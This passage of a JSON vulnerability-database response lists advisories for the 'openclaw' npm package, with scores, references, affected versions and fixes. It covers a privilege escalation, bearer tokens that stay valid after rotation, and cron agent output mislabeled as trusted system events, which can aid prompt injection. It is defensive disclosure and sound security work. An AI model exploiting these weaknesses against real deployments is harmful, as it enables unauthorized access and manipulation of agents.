"vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24" } ], "aliases": [ "GHSA-3gr8-2752-h46q" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-26sv-grsd-abcw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89951?format=api", "vulnerability_id": "VCID-294z-6z8j-97bx", "summary": "OpenClaw: Gateway operator.write Can Reach Admin-Class Telegram Config and Cron Persistence via send\n## Summary\nGateway operator.write Can Reach Admin-Class Telegram Config and Cron Persistence via send\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real shipped operator.write to admin-class Telegram config or cron persistence bug, but it is an authenticated sink-specific escalation and high is too high given the narrower scope.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `b7d70ade3b9900dbe97bd73be9c02e924ff3c986` — 2026-03-25T12:12:09-06:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.28`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zpbrent for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41359", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.092", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.09219", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.09201", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41359" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/b7d70ade3b9900dbe97bd73be9c02e924ff3c986", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:37:35Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/b7d70ade3b9900dbe97bd73be9c02e924ff3c986" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-767m-xrhc-fxm7", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:37:35Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-767m-xrhc-fxm7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41359", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41359" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-operator-write-to-admin-class-telegram-config-and-cron-persistence", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:37:35Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-operator-write-to-admin-class-telegram-config-and-cron-persistence" }, { "reference_url": "https://github.com/advisories/GHSA-767m-xrhc-fxm7", "reference_id": "GHSA-767m-xrhc-fxm7", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-767m-xrhc-fxm7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-41359", "GHSA-767m-xrhc-fxm7" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-294z-6z8j-97bx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89628?format=api", "vulnerability_id": "VCID-29a1-7ar7-67e1", "summary": "OpenClaw: Gateway HTTP endpoints re-resolve bearer auth after SecretRef rotation\n## Summary\n\nGateway HTTP and WebSocket handlers captured the resolved bearer-auth configuration when the server started. After a SecretRef rotation, the already-running gateway could continue accepting the old bearer token until restart.\n\n## Impact\n\nA bearer token that should have been revoked by SecretRef rotation could remain valid on the gateway HTTP and upgrade surfaces for the lifetime of the process. Severity remains high because the old token could continue to authorize gateway requests after operators believed it was rotated out.\n\n## Affected versions\n\n- Affected: `< 2026.4.15`\n- Patched: `2026.4.15`\n\n## Fix\n\nOpenClaw `2026.4.15` resolves active gateway auth from the runtime secret snapshot per request and per upgrade instead of using a stale startup-time value.\n\nVerified in `v2026.4.15`:\n\n- `src/gateway/server.impl.ts` exposes `getResolvedAuth()` backed by the current runtime secret snapshot.\n- `src/gateway/server-http.ts` calls `getResolvedAuth()` for each HTTP request and WebSocket upgrade before running auth checks.\n- `src/gateway/server-http.probe.test.ts` verifies `/ready` re-resolves bearer auth after rotation and rejects the old token.\n\nFix commit included in `v2026.4.15` and absent from `v2026.4.14`:\n\n- `acd4e0a32f12e1ad85f3130f63b42443ce90f094` via PR #66651\n\nThanks to @zsxsoft, Keen Security Lab, and @qclawer for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43585", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00131", "scoring_system": "epss", "scoring_elements": "0.32235", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00131", "scoring_system": "epss", "scoring_elements": "0.32265", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00143", "scoring_system": "epss", "scoring_elements": "0.34377", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43585" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/acd4e0a32f12e1ad85f3130f63b42443ce90f094", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:53:26Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/acd4e0a32f12e1ad85f3130f63b42443ce90f094" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/66651", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/66651" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xmxx-7p24-h892", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:53:26Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xmxx-7p24-h892" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43585", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43585" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-bearer-token-validation-bypass-via-stale-secretref-resolution", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:53:26Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-bearer-token-validation-bypass-via-stale-secretref-resolution" }, { "reference_url": "https://github.com/advisories/GHSA-xmxx-7p24-h892", "reference_id": "GHSA-xmxx-7p24-h892", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xmxx-7p24-h892" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109881?format=api", "purl": "pkg:npm/openclaw@2026.4.15", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.15" } ], "aliases": [ "CVE-2026-43585", "GHSA-xmxx-7p24-h892" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-29a1-7ar7-67e1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89187?format=api", "vulnerability_id": "VCID-2c8p-gbaw-3ye4", "summary": "OpenClaw: Isolated cron awareness events were recorded as trusted system events\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nOutput from webhook-triggered isolated cron agent runs could be queued into the main session awareness stream without `trusted: false`. That made the event render as a trusted `System:` event instead of an untrusted system event.\n\nThis is a trust-labeling issue that can strengthen prompt-injection impact, but it does not directly bypass gateway auth, tool policy, or sandboxing. Severity is low.\n\n## Fix\n\nOpenClaw now preserves untrusted labels for isolated cron awareness events and forwards the trust flag through cron delivery helpers.\n\nFix commit:\n\n- `f61896b03cc7031f51106a04566831f4ac2a0bd7`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44999", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04732", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04745", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04761", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44999" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "1.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/f61896b03cc7031f51106a04566831f4ac2a0bd7", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "1.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-12T13:52:52Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/f61896b03cc7031f51106a04566831f4ac2a0bd7" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-57r2-h2wj-g887", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "1.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-12T13:52:52Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-57r2-h2wj-g887" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44999", "reference_id": "", "reference_type": "", "scores": [ { "value": "1.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44999" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-improper-trust-labeling-in-isolated-cron-awareness-events", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "1.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-12T13:52:52Z/" } ], "url": 